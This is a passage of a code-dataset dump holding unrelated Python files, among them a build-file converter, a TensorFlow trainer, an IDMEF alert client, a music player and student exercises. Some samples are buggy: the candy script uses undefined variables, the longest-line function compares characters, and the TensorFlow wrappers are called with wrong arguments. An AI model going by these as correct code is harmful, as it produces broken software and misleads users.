set.\n if args.dir:\n args.root_dir = None\n\n return args\n\n\ndef setup_environment():\n \"\"\"Sets up some environment globals.\"\"\"\n global repo_root\n\n # Determine the repository root (two dir-levels up).\n repo_root = os.path.dirname(\n os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\n\ndef log(*args, **kwargs):\n print(*args, **kwargs, file=sys.stderr)\n\n\ndef convert_directory_tree(root_directory_path, write_files,\n allow_partial_conversion):\n log(f\"convert_directory_tree: {root_directory_path}\")\n for root, _, _ in os.walk(root_directory_path):\n convert_directory(root, write_files, allow_partial_conversion)\n\n\ndef convert_directory(directory_path, write_files, allow_partial_conversion):\n if not os.path.isdir(directory_path):\n raise FileNotFoundError(f\"Cannot find directory '{directory_path}'\")\n\n skip_file_path = os.path.join(directory_path, \".skip_bazel_to_cmake\")\n build_file_path = os.path.join(directory_path, \"BUILD\")\n cmakelists_file_path = os.path.join(directory_path, \"CMakeLists.txt\")\n\n if os.path.isfile(skip_file_path) or not os.path.isfile(build_file_path):\n # No Bazel BUILD file in this directory or explicit skip.\n return\n\n global repo_root\n rel_build_file_path = os.path.relpath(build_file_path, repo_root)\n rel_cmakelists_file_path = os.path.relpath(cmakelists_file_path, repo_root)\n log(f\"Converting {rel_build_file_path} to {rel_cmakelists_file_path}\")\n\n cmake_file_exists = os.path.isfile(cmakelists_file_path)\n copyright_line = f\"# Copyright {datetime.date.today().year} Google LLC\"\n write_allowed = write_files\n if cmake_file_exists:\n with open(cmakelists_file_path) as f:\n for i, line in enumerate(f):\n if line.startswith(\"# Copyright\"):\n copyright_line = line.rstrip()\n if EDIT_BLOCKING_PATTERN.search(line):\n log(f\" {rel_cmakelists_file_path} already exists, and \"\n f\"line {i + 1}: '{line.strip()}' prevents edits. \"\n f\"Falling back to preview\")\n write_allowed = False\n\n if write_allowed:\n # TODO(scotttodd): Attempt to merge instead of overwrite?\n # Existing CMakeLists.txt may have special logic that should be preserved\n if cmake_file_exists:\n log(f\" {rel_cmakelists_file_path} already exists; overwriting\")\n else:\n log(f\" {rel_cmakelists_file_path} does not exist yet; creating\")\n log(\"\")\n\n with open(build_file_path, \"rt\") as build_file:\n build_file_code = compile(build_file.read(), build_file_path, \"exec\")\n try:\n converted_text = bazel_to_cmake_converter.convert_build_file(\n build_file_code,\n copyright_line,\n allow_partial_conversion=allow_partial_conversion)\n if write_allowed:\n with open(cmakelists_file_path, \"wt\") as cmakelists_file:\n cmakelists_file.write(converted_text)\n else:\n print(converted_text, end=\"\")\n except (NameError, NotImplementedError) as e:\n log(f\"Failed to convert {rel_build_file_path}.\", end=\" \")\n log(\"Missing a rule handler in bazel_to_cmake.py?\")\n log(f\" Reason: `{type(e).__name__}: {e}`\")\n except KeyError as e:\n log(f\"Failed to convert {rel_build_file_path}.\", end=\" \")\n log(\"Missing a conversion in bazel_to_cmake_targets.py?\")\n log(f\" Reason: `{type(e).__name__}: {e}`\")\n\n\ndef main(args):\n \"\"\"Runs Bazel to CMake conversion.\"\"\"\n global repo_root\n\n write_files = not args.preview\n\n if args.root_dir:\n convert_directory_tree(os.path.join(repo_root, args.root_dir), write_files,\n args.allow_partial_conversion)\n elif args.dir:\n convert_directory(os.path.join(repo_root, args.dir), write_files,\n args.allow_partial_conversion)\n\n\nif __name__ == \"__main__\":\n setup_environment()\n main(parse_arguments())\n","sub_path":"build_tools/bazel_to_cmake/bazel_to_cmake.py","file_name":"bazel_to_cmake.py","file_ext":"py","file_size_in_byte":6290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"33734508","text":"'''\nДан текстовый файл. Найти длину самой длинной\nстроки.\n'''\ndef readFile(myFale: str) -> list:\n '''The function opens and reads a file'''\n with open(myFale, 'r') as f:\n lines = f.readlines()\n return lines\n\ndef long_line(lines: list) -> int:\n '''Line length counting function'''\n longest_string = []\n for elem in lines:\n for ls in elem:\n if len(ls) > len(longest_string):\n longest_string = elem\n return len(longest_string)\n\nif __name__ == \"__main__\":\n \n myFale = 'F:\\\\IT_School\\\\nichipurenko\\\\Lesson_18_DZ_Nichipurenko_A.V\\\\Text5.txt'\n\n lines = readFile(myFale)\n print()\n print(\"Result: \", long_line(lines),'\\n')","sub_path":"Lesson_18_DZ_Nichipurenko_A.V/Lesson_18_DZ_4_Nichipurenko_A.V.py","file_name":"Lesson_18_DZ_4_Nichipurenko_A.V.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"172871057","text":"import ezff\nfrom ezff.interfaces import gulp, qchem\nfrom ezff.utils.reaxff import reax_forcefield\n\n# Define ground truths\ngt_gs = qchem.read_structure('ground_truths/optCHOSx.out')\ngt_gs_atomic_charges = qchem.read_atomic_charges('ground_truths/optCHOSx.out')\n\ndef my_error_function(variable_values, template):\n\n myrank = ezff.get_pool_rank()\n path = str(myrank)\n\n # Calculate Ground State Charges\n md_gs_job = gulp.job(path = path)\n md_gs_job.structure = gt_gs\n md_gs_job.forcefield = ezff.generate_forcefield(template, variable_values, FFtype = 'reaxff')\n md_gs_job.options['pbc'] = False\n md_gs_job.options['relax_atoms'] = False\n md_gs_job.options['relax_cell'] = False\n md_gs_job.options['atomic_charges'] = True\n # Run GULP calculation\n md_gs_job.run()\n # Read output from completed GULP job and clean-up\n md_gs_atomic_charges = md_gs_job.read_atomic_charges()\n md_gs_job.cleanup()\n\n # Calculate error\n charg_error = ezff.error_atomic_charges(MD=md_gs_atomic_charges, GT=gt_gs_atomic_charges)\n return [charg_error]\n\n\n# Generate forcefield template and variable ranges\nFF = reax_forcefield('ffield')\nFF.make_template_qeq('S')\nFF.generate_templates()\n\n\nif __name__ == '__main__':\n\n obj = ezff.FFParam(error_function = my_error_function, num_errors = 1)\n obj.read_variable_bounds('param_ranges')\n obj.read_forcefield_template('ff.template.generated')\n\n obj.set_algorithm('randomsearch_so', population_size = 32)\n obj.parameterize(num_epochs = 5)\n obj.set_algorithm('ngopt_so', population_size = 32)\n obj.parameterize(num_epochs = 5)\n","sub_path":"examples/reaxff-charge-gulp-serial/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"169018506","text":"import json \nimport logging \nfrom data_loader_tf import CifarDataset \nfrom model import AlexNet \n\nfrom matplotlib import pyplot as plt\nimport pdb\n\nimport tensorflow as tf\n\nfrom model import model_fn\n\ndef main():\n\twith open(\"config.json\", \"r\") as f:\n\t\tconfig = json.load(f)\n\n\t# Load Cifar data \n\tdata = CifarDataset(config)\n\n\t# x, y = train_input_fn(config, data)\n\n\t# pdb.set_trace()\n\n\tmodel = tf.estimator.Estimator(model_fn=model_fn, \n\t\tparams=config, \n\t\tmodel_dir=\"./saved/\")\n\n\t# pdb.set_trace()\n\n\t## Training \n\ttrain_input_fn_wrapper_estimator = train_input_fn_wrapper(data=data, config=config, train=True)\n\n\t# pdb.set_trace()\n\n\tmodel.train(input_fn=train_input_fn_wrapper_estimator, \n\t\tsteps=config[\"trainer\"][\"epochs\"] * config[\"trainer\"][\"batch_size\"])\n\n\n\t## Evaluation \n\ttest_input_fn_wrapper_estimator = test_input_fn_wrapper(data=data, config=config, train=False)\n\tresult = model.evaluate(input_fn=test_input_fn_wrapper_estimator)\n\tprint(\"result: {:.3f}\".format(result))\n\n\ndef preprocess_data(data, config, train):\n\t# Rescale images\n\tdata = data.map(lambda x, y: (tf.div(tf.cast(x, tf.float32), 255.0), y))\t\n\t# Resize images\n\tdata = data.map(lambda x, y: (tf.image.resize_images(x, [256, 256]), y))\n\t# One-hot the output\n\tdata = data.map(lambda x, y: (x, tf.one_hot(y, 10)))\n\n\tif train: \n\t\t# IF training, read a buffer and randomly shuffle it\n\t\tdata = data.shuffle(buffer_size=config[\"trainer\"][\"buffer_size\"])\n\t\t# Allow infinite reading of the data in training \n\t\tnum_repeat = None\n\telse:\n\t\t# if testing then don't shuffle the data \n\t\tnum_repeat = 1\n\n\t# Repeat the dataset the given number of times \n\tdata = data.repeat(num_repeat)\n\n\tif train: \n\t\tdata = data.batch(config[\"trainer\"][\"batch_size\"]) \t\t\n\telse:\n\t\tdata = data.batch(config[\"evaluation\"][\"batch_size\"])\n\n\t# Create an iterator for the dataset and the above modifications\n\titerator = data.make_one_shot_iterator()\n\t# Get the next batch of images and labels\n\timages_batch, labels_batch = iterator.get_next()\n\n\t# The input-function must return a dict wrapping the images\n\tx = {'image': images_batch}\n\ty = labels_batch \n\n\treturn (x, y)\t\n\n\ndef train_input_fn_wrapper(config, data):\n\tdef train_input_fn():\n\t\t# Extract train data\n\t\tX_train, y_train = data.X_train, data.y_train\n\t\t# Create tf.data.Dataset instance from numpy array\n\t\ttrain_dataset = tf.data.Dataset.from_tensor_slices((X_train, y_train))\n\n\t\t# preprocess data\n\t\tx, y = preprocess_data(train_dataset, config, train=True)\n\n\t\t# # # Rescale images\n\t\t# # train_dataset = train_dataset.map(lambda x, y: (tf.div(tf.cast(x, tf.float32), 255.0), y))\t\n\t\t# # # Resize images \n\t\t# # train_dataset = train_dataset.map(lambda x, y: (tf.image.resize_images(x, [256, 256]), y))\n\n\t\t# # TODO : Add image augmentation functions\n\n\t\t# # Read a buffer and randomly shuffle it\n\t\t# train_dataset = train_dataset.shuffle(buffer_size=config[\"trainer\"][\"buffer_size\"])\n\t\t# # Allow infinite reading of the data in training \n\t\t# num_repeat = None \n\t\t# train_dataset = train_dataset.repeat(count=num_repeat)\n\t\t# # Get a batch of the given size\n\t\t# train_dataset = train_dataset.batch(config[\"trainer\"][\"batch_size\"])\n\t\t# # Create an iterator for the dataset and the above modifications\n\t\t# iterator = train_dataset.make_one_shot_iterator()\n\t\t# # Get the next batch of images and labels\n\t\t# images_batch, labels_batch = iterator.get_next()\n\n\t\t# # The input-function must return a dict wrapping the images\n\t\t# x = {'image': images_batch}\n\t\t# y = labels_batch \n\n\t\treturn (x, y)\t\t\n\n\t\"\"\" Wrap the train_input_fn because the estimator function does not accept\n\tany input arguments \"\"\"\n\treturn train_input_fn # return function call \n\n\n\ndef test_input_fn_wrapper(config, data):\n\tdef test_input_fn():\n\t\t# Extract train data\n\t\tX_test, y_test = data.X_test, data.y_test\n\t\t# Create tf.data.Dataset instance from numpy array\n\t\ttest_dataset = tf.data.Dataset.from_tensor_slices((X_test, y_test))\n\n\t\t# preprocess data\n\t\tx, y = preprocess_data(test_dataset, data, train=False)\n\n\t\treturn x, y\n\n\t\"\"\" Wrap the test_input_fn because the estimator function does not accept\n\tany input arguments \"\"\"\n\treturn test_input_fn # return function call\n\n\n# def model_fn()\n\nif __name__ == '__main__':\n\tlogging.basicConfig(level=logging.INFO, format='%(levelname)s:%(name)s: %(message)s')\n\n\tmain()","sub_path":"AlexNet/TensorFlow/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"492869366","text":"# Candy Coding - (C) Ryan Kelley mr.kelley.teaches@gmail.com\n# Version 0.2a - 01/29/2017\n\n# The next line of code imports the function RANDINT from the RANDOM Python module. \nfrom random import randint # This allows us to generate random integers. \n\n\n# The next line of code DEFINES a FUNCTION. This function is named roll_d6. The emtpy () indicates this function takes no ARGUMENTS.\ndef roll_d6():\n die_roll = randint(1,6)\n print(\"You rolled a\",die_roll,\".\\n\")\n return die_roll # This function returns a random integer from 1 to 6. \n \n# The next line of code CALLS the function roll_d6. This causes the code to execute. \nroll_d6() \n\n# The next lines define the VARIABLES used in this program. The = tells Python to ASSIGN the VALUE on the right side to the variable on the left side of the = sign. \nchoc_kiss = 1\ngummy_bears = 1\nstar_b = 1\ncandy_type = 1\ncount = 1\n\nwhile count < 20:\n candy = roll_d6()\n if candy == 1:\n \n count +=1 \n elif candy == 2:\n gummy_bears += 1\n count += 1\n elif candy == 3:\n m_mallow += 1\n count += 2\n elif candy == 4:\n star_b += 1\n count +=3\n elif candy == 5:\n swedish_fish += 1\n gummy_bears += 1\n m_mallow += 2\n star_b += 1\n count += 4\n else:\n swedish_fish -= 1\n gummy_bears -= 1\n m_mallow -= 1\n star_b -= 1\n count -= 1\n\nprint(\"You should have\", swedish_fish, \"Swedish Fish.\")\nprint(\"You should have\", gummy_bears, \"Gummi Bears.\")\nprint(\"You should have\", star_b, \"Star Bursts.\")\nprint(\"You should have\", m_mallow, \"marshmallows.\")\n\n# Now for the fun stuff!\n\nmnm = 0\n\nif swedish_fish > 3:\n print(\"Woof. Woof.\") # You must bark like a dog.\n mnm += 2\nelse:\n print(\"Cluck. Cluck.\") # You must cluck like a chicken.\n mnm += 1\n\nif gummy_bears != 4:\n print(\"Stand up on one leg and touch your nose for 10 seconds.\") # Don't be shy.\n mnm += 2\nelse:\n print(\"You have four Gummy Bears! Eat one now.\") # Tasty.\n mnm += 1\n \nif star_b > 0:\n print(\"I have a nice collection of Star Bursts!\") # Say this out loud. SAY IT! \n mnm += 1\nelse:\n print(\"Look on the bright side: you didn't get any yellow ones!\") # \n mnm += 5\n\nif m_mallow % 2 == 0:\n print(\"Even Steven!\") # Who's Steven?\n mnm += 2\nelse:\n print(\"Odd Todd!\") # Wait, what happened to Steven?\n mnm += 3\n\nprint(\"You should have\", mnm, \"M&M's.\") \n\n\n \n\n\n","sub_path":"python/candy_coding_0.2a.py","file_name":"candy_coding_0.2a.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"333411400","text":"\"\"\"\ninput: bad, adb (alpha characters)\noutput: they are the same\n\nsolution: hash\n1. no duplicated char:\nuse a bitmap as hash\n2. duplicated char:\nuse a array as hash\n\"\"\"\n\n\ndef no_duplicated_str(s1, s2):\n def f(x): return ord(x) - ord(\"A\")\n has = 0\n for c in s1:\n has |= 1 << f(c)\n for c in s2:\n has ^= 1 << f(c)\n if has != 0:\n return False\n return True\n\n\ndef duplicated_str(s1, s2):\n def f(x): return (ord(x) - ord(\"A\")\n ) if \"Z\" >= \"x\" else (ord(x) - ord(\"a\") + 26)\n s = [0 for _ in range(52)]\n for c in s1:\n s[f(c)] += 1\n for c in s2:\n s[f(c)] -= 1\n for i in s:\n if i != 0:\n return False\n return True\n\n\ndef main():\n s1 = \"ABCDabcd\"\n s2 = \"aABCbcdD\"\n if no_duplicated_str(s1, s2):\n print(\"right1\")\n s1 = \"aaabbbcccdddAAA\"\n s2 = \"AAAabcabcabcddd\"\n if duplicated_str(s1, s2):\n print(\"right2\")\n s1 = \"abcde\"\n s2 = \"abcd\"\n if not no_duplicated_str(s1, s2):\n print(\"right3\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"learning-algorithm-book/1/1-2.py","file_name":"1-2.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"599814260","text":"from resources.models.resource import Resource\nfrom django.shortcuts import render\nfrom rest_framework.response import Response\n\nfrom respa_o365.o365_calendar import MicrosoftApi, O365Calendar\nfrom respa_o365.o365_notifications import O365Notifications\nfrom respa_o365.serializers import OutlookCalendarLinkSerializer\nfrom respa_o365.models import OutlookCalendarLink, OutlookCalendarReservation\nfrom rest_framework import viewsets\nfrom rest_framework.decorators import action\nfrom resources.api.reservation import UserFilterBackend\n\nclass OutlookCalendarLinkViewSet(viewsets.ModelViewSet):\n queryset = OutlookCalendarLink.objects.none()\n serializer_class = OutlookCalendarLinkSerializer\n filter_backends = [UserFilterBackend]\n \n def get_queryset(self):\n if self.request.user.is_anonymous:\n return OutlookCalendarLink.objects.none()\n\n if self.request and self.request.user:\n if self.request.user.is_superuser:\n queryset = OutlookCalendarLink.objects.all()\n else:\n queryset = OutlookCalendarLink.objects.all().filter(user=self.request.user)\n\n resource_id = self.request.query_params.get('resource_id', None)\n if resource_id is not None:\n queryset = queryset.filter(resource=resource_id)\n\n return queryset\n return OutlookCalendarLink.objects.none()\n\n def list(self, request, *args, **kwargs):\n resource_id = request.query_params.get('resource_id', None)\n if resource_id is None:\n return super().list(self, request, *args, **kwargs)\n \n queryset = self.filter_queryset(self.get_queryset())\n serializer = self.get_serializer(queryset, many=True)\n\n try:\n resource = Resource.objects.get(pk=resource_id)\n link_exists = False\n has_permission = resource.is_manager(request.user) or resource.is_admin(request.user)\n if has_permission:\n link_exists = OutlookCalendarLink.objects.all().filter(resource=resource_id).exists()\n can_create = has_permission and not link_exists\n except:\n can_create = False\n\n data = {\n 'results': serializer.data,\n 'can_create': can_create\n }\n\n return Response(data)\n ","sub_path":"respa_o365/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"33546723","text":"# Copyright (C) 2021 CS GROUP - France. All Rights Reserved.\n# SPDX-License-Identifier: BSD-2-Clause\n\nimport uuid\nfrom datetime import datetime\nfrom idmefv2 import Message\nfrom idmefv2_transport import get_transport\nfrom args import parse_args\n\n\ndef main(args):\n print(\"READY\", flush=True)\n\n now = datetime.now().isoformat('T')\n msg = Message()\n msg['Version'] = '2.0.3'\n msg['ID'] = str(uuid.uuid4())\n msg['CreateTime'] = now\n msg['StartTime'] = now\n msg['Category'] = ['Attempt.Login']\n msg['Description'] = 'Someone tried to login as root from 12.34.56.78 '\\\n 'port 1806 using the password method'\n msg['Severity'] = 'Medium'\n msg['Analyzer'] = {\n 'IP': '127.0.0.1',\n 'Name': 'prelude-lml',\n 'Model': 'My Log Analyzer v0.0.1',\n 'Category': ['LOG'],\n 'Data': ['Log'],\n 'Method': ['Signature'],\n }\n msg['Source'] = [\n {\n 'IP': '12.34.56.78',\n 'Port': [1806],\n }\n ]\n msg['Target'] = [\n {\n 'IP': '23.34.45.56',\n 'Port': [22],\n 'Service': 'sshd',\n }\n ]\n\n transport = get_transport('file://%s' % args.tmpdir, content_type=args.mime)\n transport.start()\n transport.send_message(msg)\n transport.stop()\n\n\nif __name__ == '__main__':\n args = parse_args(\"client\")\n main(args)\n","sub_path":"examples/file/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"339298384","text":"#!/usr/bin/python3.7\nimport json\nimport os\nimport subprocess\nfrom pathlib import Path\n\nimport userinput\nfrom playsong import PlaySong\nfrom speaktext import speak_text\n\n\n# todo: make sure stereo channels working\n\nclass PiPlayer:\n\tMUSIC_PATH = \"/home/pi/Music/Dynamix\"\n\t# MUSIC_PATH = r\"/media/pi/Moms Eh/Music/Dynamix\"\n\tSTATE_FILE_PATH = os.path.join(Path(__file__).resolve().parent, \"state.json\")\n\tVOLUME_CHANGE_DELTA = 5\n\n\tdef __init__(self):\n\t\tself.album_num = 0\n\t\tself.track_num = 0\n\t\tself.album_list = []\n\t\tself.volume_percent = self._get_curr_vol_percent()\n\t\tself.play_song_thread = None\n\t\tself._build_album_list()\n\t\tself._read_last_playback_state()\n\n\tdef _build_album_list(self):\n\t\tfor dirpath, dirnames, filenames in os.walk(PiPlayer.MUSIC_PATH):\n\t\t\tif len(filenames) == 0:\n\t\t\t\tcontinue\n\t\t\talbum = []\n\t\t\tfor filename in filenames:\n\t\t\t\talbum.append(os.path.join(dirpath, filename))\n\t\t\talbum.sort(key=lambda path: path.split(\"/\")[-1])\n\t\t\tself.album_list.append(album)\n\t\tself.album_list.sort(key=lambda album: album[0].split(\"/\")[-2])\n\t\tif len(self.album_list) == 0:\n\t\t\traise Exception(\"No audio found at path: \" + PiPlayer.MUSIC_PATH)\n\n\tdef _get_curr_vol_percent(self):\n\t\tGET_VOL_CMD = 'amixer -c 0 get Headphone | grep -oP \"\\[\\d*%\\]\" | sed s:[][%]::g'\n\t\treturn int(subprocess.getoutput(GET_VOL_CMD))\n\n\tdef _read_last_playback_state(self):\n\t\tif os.path.isfile(PiPlayer.STATE_FILE_PATH):\n\t\t\twith open(PiPlayer.STATE_FILE_PATH, 'r') as state:\n\t\t\t\t[self.album_num, self.track_num] = json.load(state)\n\t\t\t# in case the user deleted some albums/tracks since last state save, check that indexes are within range\n\t\t\tif self.album_num > len(self.album_list) - 1 or self.track_num > len(self.album_list[self.album_num]) - 1:\n\t\t\t\tself.album_num = 0\n\t\t\t\tself.track_num = 0\n\n\tdef _write_current_playback_state(self):\n\t\twith open(PiPlayer.STATE_FILE_PATH, 'w') as state:\n\t\t\tjson.dump([self.album_num, self.track_num], state)\n\n\tdef _speak_album_name(self):\n\t\tfull_path_split = self.album_list[self.album_num][self.track_num].split(\"/\")\n\t\talbum_name = full_path_split[-2]\n\t\tspeak_text(album_name)\n\n\tdef play_song_file(self, file_name):\n\t\tprint(\"now playing: album_num=\", self.album_num, \"track_num=\", self.track_num, file_name, flush=True)\n\t\tself._write_current_playback_state()\n\t\tself.play_song_thread = PlaySong(self, file_name)\n\t\tself.play_song_thread.start()\n\n\tdef play_new_song(self, song_index_changer):\n\t\tself.play_song_thread.user_stop()\n\t\tsong_index_changer()\n\t\tself.play_song_file(self.album_list[self.album_num][self.track_num])\n\n\tdef play_next_song(self):\n\t\tprint(\"next song\", flush=True)\n\t\tdef song_index_changer():\n\t\t\tif self.track_num < len(self.album_list[self.album_num]) - 1:\n\t\t\t\tself.track_num += 1\n\t\t\telse:\n\t\t\t\tself._increment_album_num()\n\t\tself.play_new_song(song_index_changer)\n\n\tdef play_previous_song(self):\n\t\tprint(\"previous song\", flush=True)\n\t\tdef song_index_changer():\n\t\t\tif self.track_num > 0:\n\t\t\t\tself.track_num -= 1\n\t\t\telse:\n\t\t\t\tself._decrement_album_num()\n\t\tself.play_new_song(song_index_changer)\n\n\tdef play_next_album(self):\n\t\tprint(\"next album\", flush=True)\n\t\tself.play_new_song(self._increment_album_num)\n\n\tdef play_previous_album(self):\n\t\tprint(\"previous album\", flush=True)\n\t\tself.play_new_song(self._decrement_album_num)\n\n\tdef _increment_album_num(self):\n\t\tif self.album_num < len(self.album_list) - 1:\n\t\t\tself.album_num += 1\n\t\telse:\n\t\t\tself.album_num = 0\n\t\tself.track_num = 0\n\t\tself._speak_album_name()\n\n\tdef _decrement_album_num(self):\n\t\tif self.album_num > 0:\n\t\t\tself.album_num -= 1\n\t\telse:\n\t\t\tself.album_num = len(self.album_list) - 1\n\t\tself.track_num = 0\n\t\tself._speak_album_name()\n\n\tdef volume_up(self):\n\t\tprint(\"volume up\", flush=True)\n\t\tself._set_volume_percent(PiPlayer.VOLUME_CHANGE_DELTA)\n\n\tdef volume_down(self):\n\t\tprint(\"volume down\", flush=True)\n\t\tself._set_volume_percent(-PiPlayer.VOLUME_CHANGE_DELTA)\n\n\tdef _set_volume_percent(self, delta):\n\t\tMAX_VOL_PERCENT = 100\n\t\tMIN_VOL_PERCENT = 0\n\t\tself.volume_percent += delta\n\t\tself.volume_percent = max(MIN_VOL_PERCENT, min(self.volume_percent, MAX_VOL_PERCENT))\n\t\tSET_VOL_CMD = [\"amixer\", \"-c\", \"0\", \"sset\", \"Headphone\", str(self.volume_percent) + \"%\"]\n\t\tself.song_play_pause()\n\t\tsubprocess.run(SET_VOL_CMD)\n\t\tspeak_text(str(self.volume_percent) + \" percent\")\n\t\tself.song_play_pause()\n\n\tdef song_play_pause(self):\n\t\tprint(\"play/pause\", flush=True)\n\t\tself.play_song_thread.user_play_pause()\n\n\tdef start(self, input_device):\n\t\tself.play_song_file(self.album_list[self.album_num][self.track_num])\n\t\twhile True:\n\t\t\tinput_device.wait_for_input(self)\n\n\tdef _print_current_state_debug(self):\n\t\tprint(\"album num:\", self.album_num)\n\t\tprint(\"track num:\", self.track_num)\n\t\tprint(\"vol percent:\", self.volume_percent)\n\t\tprint(\"play song thread:\", self.play_song_thread)\n\nif __name__ == \"__main__\":\n\tcontrol = userinput.IRRemoteControl()\n\tPiPlayer().start(control)\n","sub_path":"piplayer.py","file_name":"piplayer.py","file_ext":"py","file_size_in_byte":4840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"164496910","text":"from PIL import Image \n\nwidth, height = 480,360\ncanv = Image.new(\"HSV\", (width, height))\n \nzoom = 1.3\nlx, ly = 4, 3\ncx, cy = -0.761574,-0.0847596\nmax_iter = 50\nframes_count = 24\n\ndef calc_frac(x, y):\n c = ((x/width - 0.5) * (lx/zoom) ,(y/height - 0.5) * (ly/zoom))\n z = (0,0)\n for i in range(max_iter):\n z = (cx + z[0]**2 - z[1]**2 + c[0], cy + 2*z[0]*z[1] + c[1])\n if(z[0] == 0 and z[1] == 0):\n return (255,255,255)\n elif(abs(z[0]) > 2 or abs(z[1]) > 2):\n return (int(i/max_iter *255),0,0)\n return (255,255,255)\n\nfor f in range(frames_count):\n for i in range(height):\n for j in range(width):\n canv.putpixel((j,i), calc_frac(j,i))\n zoom*=(1+(f+1)/3)\n max_iter+=6\n print(\"saving {} out of {}\".format(f, frames_count))\n canv.save(\"othermandelbrot{}.png\".format(f))\n #canv.show()\n","sub_path":"pillow_mandel/pillow_mandelbrot.py","file_name":"pillow_mandelbrot.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"357664632","text":"# -*- coding: cp1251 -*- #\r\n# Python 3.x.x\r\n\r\nimport logging\r\nfrom locators import *\r\n\r\n\r\ndef web_loger(func):\r\n \"\"\" LOGER \"\"\"\r\n def wrapper(self, *argv, **kwargv):\r\n\r\n logging.basicConfig(filename='web.log',\r\n filemode=\"w\",\r\n format='%(asctime)s - %(levelname)s - %(message)s',\r\n level=logging.INFO)\r\n logging.info(func.__doc__)\r\n return func(self, *argv, **kwargv)\r\n\r\n return wrapper\r\n\r\n\r\nclass BasePage(object):\r\n \"\"\"Base class to initialize the base page that will be called from all pages\"\"\"\r\n\r\n def __init__(self, driver):\r\n self.driver = driver\r\n\r\n\r\nclass MainPage(BasePage):\r\n\r\n def __init__(self, driver):\r\n super().__init__(driver)\r\n self.main_page = MainPageLocators(driver=self.driver)\r\n\r\n @web_loger\r\n def is_title_matches(self):\r\n \"\"\"сравнение имени сайта\"\"\"\r\n return \"Travelocity\" in self.driver.title\r\n\r\n @web_loger\r\n def select_car_flex(self):\r\n \"\"\"сначала нажмем на FLEX car\"\"\"\r\n element = self.main_page.car_flex_btn\r\n element.click()\r\n\r\n @web_loger\r\n def select_hotel_flex(self):\r\n \"\"\"нажмемем на нужный нам FLEX с выбором отеля\"\"\"\r\n element = self.main_page.hotel_flex_btn\r\n element.click()\r\n\r\n @web_loger\r\n def input_town_area(self):\r\n \"\"\"ввод поиска города\"\"\"\r\n element = self.main_page.dest_input_text_area\r\n element.send_keys('Japantown, San Francisco')\r\n element.send_keys(Keys.DOWN)\r\n\r\n @web_loger\r\n def input_date_check_in(self):\r\n \"\"\"ввод даты отправления\"\"\"\r\n check_in_data = self.main_page.input_date_check_in\r\n check_in_data.clear()\r\n check_in_data.send_keys('02/01/2019')\r\n\r\n @web_loger\r\n def input_date_check_out(self):\r\n \"\"\"ввод даты возвращения\"\"\"\r\n check_out_data = self.main_page.input_date_check_out\r\n check_out_data.clear()\r\n\r\n for i in range(11):\r\n check_out_data.send_keys(Keys.BACK_SPACE)\r\n\r\n check_out_data.send_keys('02/15/2019')\r\n\r\n @web_loger\r\n def click_search_btn(self):\r\n \"\"\"клик кнопки поиска\"\"\"\r\n search_btn = self.main_page.search_btn\r\n search_btn.click()\r\n\r\n\r\nclass HotelSelectPage(BasePage):\r\n\r\n def __init__(self, driver):\r\n super().__init__(driver)\r\n self.select_page = HotelSelectPageLocators(driver=self.driver)\r\n\r\n def is_title_matches(self):\r\n return \"Japantown\" in self.driver.title\r\n\r\n def select_hotel(self):\r\n element = self.select_page.hotel\r\n element.click()\r\n\r\n\r\nclass ChosenHotelPage(BasePage):\r\n\r\n def __init__(self, driver):\r\n super().__init__(driver)\r\n self.driver.switch_to.window(self.driver.window_handles[1])\r\n self.chosen_hotel = ChosenHotelLocators(driver=self.driver)\r\n\r\n def is_title_matches(self):\r\n return \"\" in self.driver.title\r\n\r\n def get_hotel_name(self):\r\n return self.chosen_hotel.hotel_name\r\n\r\n def press_reserve_first(self):\r\n element = self.chosen_hotel.reserve_btn_first\r\n element.click()\r\n\r\n def press_reserve_second(self):\r\n for x_p in self.chosen_hotel.reserve_btn_second:\r\n try:\r\n x_path = By.XPATH, x_p\r\n btn = WebDriverWait(self.driver, 5).until(EC.element_to_be_clickable(x_path))\r\n # print(x_p)\r\n btn.click()\r\n except TimeoutException:\r\n continue\r\n\r\n def press_float_win_btn(self):\r\n for x_p in self.chosen_hotel.float_win_btn:\r\n try:\r\n x_path = By.XPATH, x_p\r\n # x_path = By.CSS_SELECTOR, x_p\r\n fl_win_btn = WebDriverWait(self.driver, 5).until(EC.element_to_be_clickable(x_path))\r\n fl_win_btn.click()\r\n except TimeoutException:\r\n continue\r\n\r\n\r\nclass PaymentPage(BasePage):\r\n def __init__(self, driver):\r\n super().__init__(driver)\r\n self.payment_page = PaymentLocators(driver=self.driver)\r\n\r\n def get_hotel_name(self):\r\n return self.payment_page.hotel_name\r\n\r\n\r\n\r\n# used for debugging only\r\ndef main():\r\n\r\n path_to_drv = \"../drv/chromedriver.exe\"\r\n driver_index = webdriver.Chrome(executable_path=path_to_drv)\r\n driver_index.get(\"https://www.travelocity.com/\")\r\n\r\n print(driver_index.title)\r\n\r\n # -----------------------------------\r\n main_page_instant = MainPage(driver=driver_index)\r\n main_page_instant.select_car_flex()\r\n main_page_instant.select_hotel_flex()\r\n\r\n 